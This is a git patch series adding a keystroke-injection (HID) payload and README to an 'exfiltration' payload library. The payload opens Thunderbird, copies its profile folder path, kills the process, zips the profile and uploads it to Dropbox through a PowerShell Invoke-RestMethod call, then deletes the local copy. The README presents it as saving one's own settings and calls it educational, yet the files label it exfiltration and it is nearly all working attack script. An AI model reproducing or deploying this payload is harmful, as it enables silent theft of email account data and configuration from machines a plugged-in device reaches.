From 0b07031a1fcf35b0fe410c088db12c4886640cb5 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 14:18:21 +0200 Subject: [PATCH 1/7] Save Your Thunderbird Settings via Dropbox This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. --- .../Save_Your_Thunderbird_Settings/README.md | 128 ++++++++++++++++++ .../payload.txt | 121 +++++++++++++++++ 2 files changed, 249 insertions(+) create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md new file mode 100644 index 000000000..bb6d830af --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md @@ -0,0 +1,128 @@ +# Save Your Thunderbird Settings via Dropbox + +Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature. + +This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration. + +**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff! + +**Category:** Exfiltration + +## Index + +- [Overview](#overview) +- [Requirements](#requirements) +- [Test Environment](#test-environment) +- [Configuration](#configuration) +- [Functionality](#functionality) + - [System Detection](#system-detection) + - [Opening Thunderbird](#opening-thunderbird) + - [Copying Profile Folder Path](#copying-profile-folder-path) + - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox) +- [Notes](#notes) +- [Credits](#credits) + +## Overview + +This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox. + +## Requirements + +- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file. +- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem. +- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet... + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## Configuration + +Before running the program, ensure to set the following parameters correctly/as you prefer: + +- `#ACCESS_TOKEN`: Your private Dropbox access token, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). + +### I.E. + +- 1° + +```plaintext +[79] * REM Required replace '[2]': Set here the archive name, you must use the same! +[80] QUACK STRING -DestinationPath ./cache.zip +``` + +- 2° + +```plaintext +[85] * REM Required replace '[2]': Set here the archive name, you must use the same! +[86] QUACK STRING $filePath = "$env:TEMP/[2]" +``` + +- 3° + +```plaintext +[93] * REM Required replace '[2]': Set here the archive name, you must use the same! +[94] * REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' +[95] QUACK STRING $dropboxPath = "/cache.zip" +``` + +- 4° + +```plaintext +[97] * REM Required replace '[1]': Set here your Dropbox access TOKEN +[98] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +``` + +## Functionality + +### System Detection + +The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied. + +### Opening Thunderbird + +The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use. + +### Copying Profile Folder Path + +The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file. + +### Opening PowerShell and Uploading to Dropbox + +Using PowerShell, the script performs the following actions: + +1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path. +2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used. +3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file. +4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API. +5. **Cleanup:** Removes the local ZIP file after the upload is complete. + +## Notes + +- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal. +- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt new file mode 100644 index 000000000..6d35d21f3 --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -0,0 +1,121 @@ +* REM ############################################################### +* REM # # +* REM # Title : Save Your Thunderbird Settings via Dropbox # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Exfiltration # +* REM # Target : Windows 10/11 # +* REM # # +* REM ############################################################### + +* REM Opening Thunderbird settings +QUACK DELAY 1500 +QUACK WIN r +QUACK STRING thunderbird +QUACK ENTER +QUACK DELAY 1000 +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK UPARROW +QUACK UPARROW +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK UPARROW +QUACK UPARROW +QUACK UPARROW +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Inside the settings +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Inside The Profile Folder +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK CTRL c +QUACK DELAY 500 +QUACK ALT F4 +QUACK DELAY 500 + +* REM Powershell running... +QUACK WIN R +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING cd $env:TEMP +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Stop-Process -Name "thunderbird" -Force +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Compress-Archive -LiteralPath +QUACK DELAY 500 +QUACK CTRL v +QUACK DELAY 500 +* REM Required replace '[2]': Set here the archive name, you must use the same! +QUACK STRING -DestinationPath ./[2] +QUACK ENTER +QUACK DELAY 1000 + +* REM Exfiltration via Dropbox +* REM Required replace '[2]': Set here the archive name, you must use the same! +QUACK STRING $filePath = "$env:TEMP/[2]" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $filePath = $filePath -replace "\\", "/" +QUACK ENTER +QUACK DELAY 500 +* REM Required replace '[2]': Set here the archive name, you must use the same! +* REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' +QUACK STRING $dropboxPath = "[3][2]" +QUACK ENTER +QUACK DELAY 500 +* REM Required replace '[1]': Set here your Dropbox access TOKEN, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +QUACK STRING $accessToken = "[1]" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $headers = @{ +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Authorization" = "Bearer $accessToken" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Content-Type" = "application/octet-stream" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK ENTER \ No newline at end of file From f158977fdfe54cb5abd26d9d6de84f9fa0d5e4de Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 08:13:29 +0200 Subject: [PATCH 2/7] Update payload.txt --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 6d35d21f3..a5e0ece79 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -10,7 +10,7 @@ * REM Opening Thunderbird settings QUACK DELAY 1500 -QUACK WIN r +QUACK GUI r QUACK STRING thunderbird QUACK ENTER QUACK DELAY 1000 @@ -63,7 +63,7 @@ QUACK ALT F4 QUACK DELAY 500 * REM Powershell running... -QUACK WIN R +QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 From a39f4feae3bfffcbb46635fa0de24c0cfa998391 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 11:11:40 +0200 Subject: [PATCH 3/7] Adapted to the use of variables --- .../Save_Your_Thunderbird_Settings/README.md | 35 ++++++++++--------- .../payload.txt | 21 +++++------ 2 files changed, 30 insertions(+), 26 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md index bb6d830af..b3595609c 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md @@ -41,39 +41,42 @@ This program automates the process of saving your Thunderbird settings to Dropbo Before running the program, ensure to set the following parameters correctly/as you prefer: -- `#ACCESS_TOKEN`: Your private Dropbox access token, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== -- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). -- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). +- `#ACCESS_TOKEN`: Your private Dropbox access token +- `#ARCHIVE_NAME`: The name of the archive file to be created. +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded. ### I.E. -- 1° +- **Configuration** + +```shell +ARCHIVE_NAME="cache.zip" +ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +DROPBOX_FOLDER_PATH="/" +``` + +- **1°** ```plaintext -[79] * REM Required replace '[2]': Set here the archive name, you must use the same! -[80] QUACK STRING -DestinationPath ./cache.zip +[86] QUACK STRING -DestinationPath ./cache.zip ``` -- 2° +- **2°** ```plaintext -[85] * REM Required replace '[2]': Set here the archive name, you must use the same! -[86] QUACK STRING $filePath = "$env:TEMP/[2]" +[91] QUACK STRING $filePath = "$env:TEMP/cache.zip" ``` -- 3° +- **3°** ```plaintext -[93] * REM Required replace '[2]': Set here the archive name, you must use the same! -[94] * REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' -[95] QUACK STRING $dropboxPath = "/cache.zip" +[97] QUACK STRING $dropboxPath = "/cache.zip" ``` -- 4° +- **4°** ```plaintext -[97] * REM Required replace '[1]': Set here your Dropbox access TOKEN -[98] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +[100] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" ``` ## Functionality diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index a5e0ece79..967d20901 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -8,6 +8,12 @@ * REM # # * REM ############################################################### +* REM Variables Settings +ARCHIVE_NAME="cache.zip" +ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +DROPBOX_FOLDER_PATH="/" +DROPBOX_CONST_LINK ="https://content.dropboxapi.com/2/files/upload" + * REM Opening Thunderbird settings QUACK DELAY 1500 QUACK GUI r @@ -77,26 +83,21 @@ QUACK STRING Compress-Archive -LiteralPath QUACK DELAY 500 QUACK CTRL v QUACK DELAY 500 -* REM Required replace '[2]': Set here the archive name, you must use the same! -QUACK STRING -DestinationPath ./[2] +QUACK STRING -DestinationPath ./$ARCHIVE_NAME QUACK ENTER QUACK DELAY 1000 * REM Exfiltration via Dropbox -* REM Required replace '[2]': Set here the archive name, you must use the same! -QUACK STRING $filePath = "$env:TEMP/[2]" +QUACK STRING $filePath = "$env:TEMP/$ARCHIVE_NAME" QUACK ENTER QUACK DELAY 500 QUACK STRING $filePath = $filePath -replace "\\", "/" QUACK ENTER QUACK DELAY 500 -* REM Required replace '[2]': Set here the archive name, you must use the same! -* REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' -QUACK STRING $dropboxPath = "[3][2]" +QUACK STRING $dropboxPath = "$DROPBOX_FOLDER_PATH$ARCHIVE_NAME" QUACK ENTER QUACK DELAY 500 -* REM Required replace '[1]': Set here your Dropbox access TOKEN, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== -QUACK STRING $accessToken = "[1]" +QUACK STRING $accessToken = "$ACCESS_TOKEN" QUACK ENTER QUACK DELAY 500 QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) @@ -117,5 +118,5 @@ QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK STRING Invoke-RestMethod -Uri "$DROPBOX_CONST_LINK" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit QUACK ENTER \ No newline at end of file From 061a5071b0395931ce6ce30079ffe5aa1a10aa43 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 15:58:44 +0200 Subject: [PATCH 4/7] [+] ATTACKMODE --- .../exfiltration/Save_Your_Thunderbird_Settings/README.md | 8 ++++---- .../Save_Your_Thunderbird_Settings/payload.txt | 2 ++ 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md index b3595609c..bdf38ef01 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md @@ -58,25 +58,25 @@ DROPBOX_FOLDER_PATH="/" - **1°** ```plaintext -[86] QUACK STRING -DestinationPath ./cache.zip +[88] QUACK STRING -DestinationPath ./cache.zip ``` - **2°** ```plaintext -[91] QUACK STRING $filePath = "$env:TEMP/cache.zip" +[93] QUACK STRING $filePath = "$env:TEMP/cache.zip" ``` - **3°** ```plaintext -[97] QUACK STRING $dropboxPath = "/cache.zip" +[99] QUACK STRING $dropboxPath = "/cache.zip" ``` - **4°** ```plaintext -[100] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +[102] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" ``` ## Functionality diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 967d20901..134d3c4dc 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -8,6 +8,8 @@ * REM # # * REM ############################################################### +ATTACKMODE HID + * REM Variables Settings ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" From a1f6b5124f35320511cdb4a37c57dbe9be9fc4a9 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 11:50:08 +0200 Subject: [PATCH 5/7] Update payload.txt --- .../payload.txt | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 134d3c4dc..2a1f6239d 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -14,7 +14,7 @@ ATTACKMODE HID ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" DROPBOX_FOLDER_PATH="/" -DROPBOX_CONST_LINK ="https://content.dropboxapi.com/2/files/upload" +DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload" * REM Opening Thunderbird settings QUACK DELAY 1500 @@ -78,7 +78,7 @@ QUACK DELAY 1500 QUACK STRING cd $env:TEMP QUACK ENTER QUACK DELAY 500 -QUACK STRING Stop-Process -Name "thunderbird" -Force +QUACK STRING Stop-Process -Name \"thunderbird\" -Force QUACK ENTER QUACK DELAY 500 QUACK STRING Compress-Archive -LiteralPath @@ -90,16 +90,16 @@ QUACK ENTER QUACK DELAY 1000 * REM Exfiltration via Dropbox -QUACK STRING $filePath = "$env:TEMP/$ARCHIVE_NAME" +QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $filePath = $filePath -replace "\\", "/" +QUACK STRING $filePath = $filePath -replace \"\\\", \"/\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $dropboxPath = "$DROPBOX_FOLDER_PATH$ARCHIVE_NAME" +QUACK STRING $dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $accessToken = "$ACCESS_TOKEN" +QUACK STRING $accessToken = \"$ACCESS_TOKEN\" QUACK ENTER QUACK DELAY 500 QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) @@ -108,17 +108,17 @@ QUACK DELAY 500 QUACK STRING $headers = @{ QUACK ENTER QUACK DELAY 500 -QUACK STRING "Authorization" = "Bearer $accessToken" +QUACK STRING \"Authorization\" = \"Bearer $accessToken\" QUACK ENTER QUACK DELAY 500 -QUACK STRING "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") +QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + $dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") QUACK ENTER QUACK DELAY 500 -QUACK STRING "Content-Type" = "application/octet-stream" +QUACK STRING \"Content-Type\" = \"application/octet-stream\" QUACK ENTER QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri "$DROPBOX_CONST_LINK" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit -QUACK ENTER \ No newline at end of file +QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK ENTER From a34529bfa4019899d87bc8030b6764b3774cdd81 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 14:13:34 +0200 Subject: [PATCH 6/7] Update payload.txt --- .../payload.txt | 30 +++++++++---------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 2a1f6239d..e5bda9d42 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -1,22 +1,22 @@ -* REM ############################################################### -* REM # # -* REM # Title : Save Your Thunderbird Settings via Dropbox # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Exfiltration # -* REM # Target : Windows 10/11 # -* REM # # -* REM ############################################################### +############################################################### +# # +# Title : Save Your Thunderbird Settings via Dropbox # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10/11 # +# # +############################################################### ATTACKMODE HID -* REM Variables Settings +# Variables Settings ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" DROPBOX_FOLDER_PATH="/" DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload" -* REM Opening Thunderbird settings +# Opening Thunderbird settings QUACK DELAY 1500 QUACK GUI r QUACK STRING thunderbird @@ -41,7 +41,7 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Inside the settings +# Inside the settings QUACK TAB QUACK TAB QUACK TAB @@ -57,7 +57,7 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Inside The Profile Folder +# Inside The Profile Folder QUACK TAB QUACK TAB QUACK TAB @@ -70,7 +70,7 @@ QUACK DELAY 500 QUACK ALT F4 QUACK DELAY 500 -* REM Powershell running... +# Powershell running... QUACK GUI r QUACK STRING powershell QUACK ENTER @@ -89,7 +89,7 @@ QUACK STRING -DestinationPath ./$ARCHIVE_NAME QUACK ENTER QUACK DELAY 1000 -* REM Exfiltration via Dropbox +# Exfiltration via Dropbox QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 From a6b8651e9bbcc5881791e72607435f8d026111e1 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 07:45:18 +0200 Subject: [PATCH 7/7] Update payload.txt --- .../payload.txt | 21 ++++++++----------- 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index e5bda9d42..83d6d5572 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -75,7 +75,7 @@ QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 -QUACK STRING cd $env:TEMP +QUACK STRING cd \$env:TEMP QUACK ENTER QUACK DELAY 500 QUACK STRING Stop-Process -Name \"thunderbird\" -Force @@ -90,28 +90,25 @@ QUACK ENTER QUACK DELAY 1000 # Exfiltration via Dropbox -QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" +QUACK STRING \$filePath = \"\$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $filePath = $filePath -replace \"\\\", \"/\" +QUACK STRING \$filePath = \$filePath -replace \"\\\", \"/\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" +QUACK STRING \$dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $accessToken = \"$ACCESS_TOKEN\" +QUACK STRING \$fileContent = [System.IO.File]::ReadAllBytes(\$filePath) QUACK ENTER QUACK DELAY 500 -QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) +QUACK STRING \$headers = @{ QUACK ENTER QUACK DELAY 500 -QUACK STRING $headers = @{ +QUACK STRING \"Authorization\" = \"Bearer $ACCESS_TOKEN\" QUACK ENTER QUACK DELAY 500 -QUACK STRING \"Authorization\" = \"Bearer $accessToken\" -QUACK ENTER -QUACK DELAY 500 -QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + $dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") +QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + \$dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") QUACK ENTER QUACK DELAY 500 QUACK STRING \"Content-Type\" = \"application/octet-stream\" @@ -120,5 +117,5 @@ QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers \$headers -Body \$fileContent; rm \$filePath; exit QUACK ENTER